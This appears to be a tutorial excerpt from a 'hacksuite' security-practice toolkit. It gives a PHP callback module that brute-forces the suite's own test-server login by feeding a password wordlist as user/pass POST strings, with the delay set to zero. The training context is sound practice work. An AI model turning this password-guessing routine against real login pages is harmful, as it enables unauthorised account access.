..we are going to create a new app for the hacksuite. We're not going to do anything fancy here, we will make a simple app to get familiar how to write compatible scripts for the..
THC xConverter is a tool that makes use of (php) functions in order to calculate, fetch, convert and encrypt data
<?php
/*
Bruteforce the TestServer
Author: Remco Kouw
Site: http://www.hacksuite.com
Last Edit: 12-11-2014
*/
if(!defined('IN_SCRIPT')){
exit;
}
// properties for this callback
$_CBACKD = array("Attack THC_HS Login","callbackbf.php");
// we still want the callback to work when the username or the success message changes
$aAttackVars = file($_PATHS['config_root']."/login_single_user.php");
$aAttackVarsU = explode("|",$aAttackVars[4]);
$aAttackVarsS = explode("|",$aAttackVars[8]);
$aGlobalConfig = array();
$aGlobalConfig['user'] = trim($aAttackVarsU[1]);
$aGlobalConfig['success'] = trim($aAttackVarsS[1]);
/* variable properties */
// visibility: [0] => hidden, [1] => visible, [2] => don't do anything
$_CBACKV = array();
$_CBACKV[0] = array();
$_CBACKV[0]['value'] = @str_replace("Modules/thc_ss/","",$_PATHS['servers_root_http'])."/login_single_user.php";
$_CBACKV[0]['row'] = "a1";
$_CBACKV[0]['fieldclass'] = "a1f";
$_CBACKV[0]['visibility'] = 0;
$_CBACKV[1] = array();
// set to zero, bcoz we wanna be as fast as possible when bruteforcing
$_CBACKV[1]['value'] = "0";
$_CBACKV[1]['row'] = "a2";
$_CBACKV[1]['fieldclass'] = "a2f";
$_CBACKV[1]['visibility'] = 0;
$_CBACKV[2] = array();
$_CBACKV[2]['value'] = $aGlobalConfig['success'];
$_CBACKV[2]['fieldclass'] = "a5f";
$_CBACKV[2]['row'] = "a4";
$_CBACKV[2]['visibility'] = 0;
$_CBACKV[3] = array();
$_CBACKV[3]['value'] = "post";
$_CBACKV[3]['row'] = "a5";
$_CBACKV[3]['fieldclass'] = "a6f";
$_CBACKV[3]['visibility'] = 0;
$_CBACKV[4] = array();
$_CBACKV[4]['value'] = 1;
$_CBACKV[4]['row'] = "a6";
$_CBACKV[4]['fieldclass'] = "scanf";
$_CBACKV[4]['visibility'] = 2;
$_CBACKV[5] = array();
// empty won't set any value
$_CBACKV[5]['value'] = "";
$_CBACKV[5]['row'] = "callbackfunction";
$_CBACKV[5]['fieldclass'] = "callbackfunctionf";
$_CBACKV[5]['visibility'] = 1;
if(!isset($_GETCBACK)){
/* Script that brute forces the testserver of the hacksuite
Callbck must always produce a query string, which will be passed back to the SScan module so it can be attached to the query string.
NOTE 1: this function uses global variables in order to construct the string which will be added to the query.
NOTE 2: settings from the thc_ss scan will automatically be adjusted to thc_hs' html login
NOTE 3: don't rewrite this function, instead make a new one with the same name
PARAMETERS:
NONE
RETURNS:
STRING: query string OR break key word BREAK
*/
if(!function_exists("Callbck")){
function Callbck(){
global $iOffsetKeyword;
global $aListWord;
global $aGlobalConfig;
if(!isset($aListWord[$iOffsetKeyword])){
// break script
return("BREAK");
}
$sString = "user=".$aGlobalConfig['user']."&pass=".trim($aListWord[$iOffsetKeyword]);
$iOffsetKeyword++;
return($sString);
}
}
// load thc wordlist
if(false===($aListWord = @file($_PATHS['wordlists_root']."/pw_a.txt"))){
die($sOut."You need the wordlist associated with the login_single_user.php server.".$sEnd);
}
$iOffsetKeyword = 0;
// dissect the target
$aUrl = @parse_url($_CBACKV[0]['value']);
// set loops variable
$iLoops = count($aListWord);
// make a copy of the old query
$aUrl['queryold'] = (isset($aUrl['query']) && $aUrl['query']!="" ? $aUrl['queryold'] : "");
}
?>